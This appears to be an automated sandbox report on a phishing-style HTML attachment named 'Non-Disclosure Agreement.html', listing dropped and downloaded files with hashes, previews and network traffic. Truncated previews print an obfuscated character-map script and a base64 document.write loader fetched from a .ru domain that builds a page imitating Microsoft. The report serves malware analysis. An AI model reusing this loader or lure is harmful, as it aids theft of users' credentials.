                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:HTML document, ASCII text, with very long lines (7465), with CRLF line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):19729
                                                                                              Entropy (8bit):5.870278961828922
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:Slnuez85ZcYidDVvyG6Onuez85ZcYidDVvyG6JlrPlr7:C85Zcz6G/85Zcz6GSlrPlr7
                                                                                              MD5:CBCC4DD3CC39AA7126E9C1F422B83282
                                                                                              SHA1:D92CEA1DFD66CE68C2877E89BD8403FB347DC1A7
                                                                                              SHA-256:4C022FC900B9719FBB9EC5B838B820419709959CFCCB7673A41D5ED790C2705B
                                                                                              SHA-512:D88039811CE42BFF9FDFD3792739D286328F3CE20FF074584D4AFE53B0BF33662BC9E2C54666BCF2D573948A7658D44F4575506B84329BBE696B326538830F79
                                                                                              Malicious:false
                                                                                              URL:https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/
                                                                                              Preview: The way to get started is to quit talking and begin doing. -->..<script>....if(atob("aHR0cDovL1p2ZUQuZ3VyYXRpdmV6LnJ1L2hIN19DTGZXOEIwNnVEWmJGbUFpTHcv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNm
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 2 x 25, 8-bit/color RGB, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):61
                                                                                              Entropy (8bit):4.035372245524405
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:yionv//thPltSxr1xl/k4E08up:6v/lhPKv7Tp
                                                                                              MD5:2A99EECE4CAB56989A0A106220E62C46
                                                                                              SHA1:6861A1CCC4E1005A5E03DC28AD9E8D5EA25AB8F3
                                                                                              SHA-256:0036F76F6EB366160C94B2AD2CC8243B06C383291725C342F3AA3756A2712CE3
                                                                                              SHA-512:F98FEB40D5289B271A3B21A74887F965AF2C4BB9933E63166EB9CF9DC81B7B0667AA9161721B7967A9A033B748CBF442AD5B7FB38985F57BC5D25E7C5F3B4852
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR...............h+....IDAT.....$.....IEND.B`.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (41651)
                                                                                              Category:downloaded
                                                                                              Size (bytes):131537
                                                                                              Entropy (8bit):5.2237799798561975
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:1f/HuF3CpxEIqQ0/9d1EwgXAnKxnKKviV:1f/HuZ1ILGV
                                                                                              MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                                              SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                                              SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                                              SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                                              Malicious:false
                                                                                              URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/1b-c96630/db-bc0148/dc-7e9864/78-4c7d22/e1-c35781/40-7b7803/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/db-f3b1fd/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/19-c0fae7?ver=2.0&iife=1
                                                                                              Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):61
                                                                                              Entropy (8bit):3.990210155325004
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:downloaded
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              URL:https://9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru/jYpzYHmViExNWkcPprHooqPmcICSNRCVHESWFGPUOAJKQVZYGURNUKQYKRPKQYGKZJLMJYTGUELTF
                                                                                              Preview:1
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (47691)
                                                                                              Category:downloaded
                                                                                              Size (bytes):47692
                                                                                              Entropy (8bit):5.4016459163756165
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                              MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                              SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                              SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                              SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                              Malicious:false
                                                                                              URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                                              Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (32089)
                                                                                              Category:downloaded
                                                                                              Size (bytes):92629
                                                                                              Entropy (8bit):5.303443527492463
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                                              MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                                              SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                                              SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                                              SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                                              Malicious:false
                                                                                              URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                                                                                              Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):563851
                                                                                              Entropy (8bit):5.221453271093944
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:2VR57iqbPXlB5UR5vWenR5xWeMFdBjL+ks0EcU0MWEsuWe5fXbHfxlN/FNCn/Lpl:tTP0BKYtf
                                                                                              MD5:12DD1E4D0485A80184B36D158018DE81
                                                                                              SHA1:EB2594062E90E3DCD5127679F9C369D3BF39D61C
                                                                                              SHA-256:A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
                                                                                              SHA-512:F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
                                                                                              Malicious:false
                                                                                              URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
                                                                                              Preview:@charset "UTF-8";/*! @ms-mwf/mwf - v1.25.0+6321934 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                                              Category:downloaded
                                                                                              Size (bytes):26288
                                                                                              Entropy (8bit):7.984195877171481
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:56JqQaQphRbTHiKNF5z/02h5KpJW3pPOA8Y9g/:gdTTH5XKpJWdH1W/
                                                                                              MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                                              SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                                              SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                                              SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                                              Malicious:false
                                                                                              URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
                                                                                              Preview:wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap.............*.9cvt ...4... ...*....fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                              Category:downloaded
                                                                                              Size (bytes):167730
                                                                                              Entropy (8bit):5.045981547409661
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:OzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxW:clZAP+keedJ
                                                                                              MD5:AFB5C64B13342F6E568093548D0A2A9F
                                                                                              SHA1:95FC121CCCFDBA12443CF87A9C823486065A14AB
                                                                                              SHA-256:238DB52476BF8107E2E851CD3299B071ED5944B570C1603A1EA758A4FADF5F29
                                                                                              SHA-512:6FE8BADD1B94E81464C0808383A4CC77F779BF226A3C13B58B2BCB36332995EFBC7711373EE8AB2A8BC52675884F9885D168CB2DE9535E39E71B0B72940691E1
                                                                                              Malicious:false
                                                                                              URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/2b-7ae144/7e-3283eb/69-8122fc/86-016699/72-2b1d8c/80-6461e7/2a-d9be59/51-40faf7?ver=2.0
                                                                                              Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):48316
                                                                                              Entropy (8bit):5.6346993394709
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                              Malicious:false
                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):4054
                                                                                              Entropy (8bit):7.797012573497454
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                              MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                              SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                              SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                              SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (513), with no line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):513
                                                                                              Entropy (8bit):5.350826451115093
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:D0rdkqmKlO30kMWznLPQspwlZpqBijDgrgLCpWRG3a0:exmwOkkMWIvv4ELsWUp
                                                                                              MD5:602C381194795DFC124FACDF48492EF1
                                                                                              SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                                              SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                                              SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                                              Malicious:false
                                                                                              URL:https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=f65ecb70-094d-0b11-7c9d-7da1bcadfaa7
                                                                                              Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)
                                                                                              File type:HTML document, Unicode text, UTF-8 text
                                                                                              Entropy (8bit):5.484891232323886
                                                                                              TrID:
                                                                                              • HyperText Markup Language (12001/1) 29.26%
                                                                                              • HyperText Markup Language (12001/1) 29.26%
                                                                                              • HyperText Markup Language (11001/1) 26.83%
                                                                                              • HyperText Markup Language (6006/1) 14.65%
                                                                                              File name:Non-Disclosure Agreement.html
                                                                                              File size:2'502 bytes
                                                                                              MD5:d74890dfd9c79b413ae350a8ca00d8b4
                                                                                              SHA1:44ecae08c9529f9292e1797566aac34146ae1104
                                                                                              SHA256:d80348747048ec9c6851f6a6e0120d733098148dc1ee7e28128e96ea56160b5d
                                                                                              SHA512:676f7831792e5cab36c5bcbd0a16f592aed0640d06c86debbf396b01f5f87ae865b70afad270eaae0ee61c70992b52749c53b0c6448dc665ccc24b88b49922f0
                                                                                              SSDEEP:48:UkxViKSZlmlazR97x/URtZoqT1M4q9y+oK3b1cHSNjHD7+7Ux1ZPJ:UyVOXzR97moKBqMvK3bmSNjHu7sPJ
                                                                                              TLSH:F85153605F1B83BB2403C491D71F925C6AEF933B1906C7A720C5A3685A117BF929F3D4
                                                                                              File Content Preview:<html>.<head><meta charset="UTF-8"> <span> She wrote a heartfelt letter to a friend. </span> --></head><body>.<script>.honeybee = {"....":":","....":"h","....":"8","....":"f","....":"r","....":".","....":"1","....":"o","...":"l",".......":"/","....":
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 19, 2024 14:35:36.695414066 CET4434970620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:36.750252008 CET49706443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:36.887274027 CET4434970620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:36.888730049 CET49706443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:37.008322001 CET4434970620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:37.430609941 CET4434970620.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:37.484616041 CET49706443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:37.750284910 CET49674443192.168.2.6173.222.162.64
                                                                                              Dec 19, 2024 14:35:37.750288963 CET49673443192.168.2.6173.222.162.64
                                                                                              Dec 19, 2024 14:35:38.062685013 CET49672443192.168.2.6173.222.162.64
                                                                                              Dec 19, 2024 14:35:46.177334070 CET49710443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:46.177361965 CET4434971020.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:46.177536964 CET49710443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:46.178232908 CET49710443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:46.178245068 CET4434971020.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:46.407677889 CET49715443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:46.407716036 CET4434971569.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:46.407974005 CET49715443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:46.408205032 CET49715443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:46.408216953 CET4434971569.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:47.377175093 CET49673443192.168.2.6173.222.162.64
                                                                                              Dec 19, 2024 14:35:47.408432007 CET49674443192.168.2.6173.222.162.64
                                                                                              Dec 19, 2024 14:35:47.679712057 CET4434971569.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:47.679975986 CET49715443192.168.2.669.49.245.172
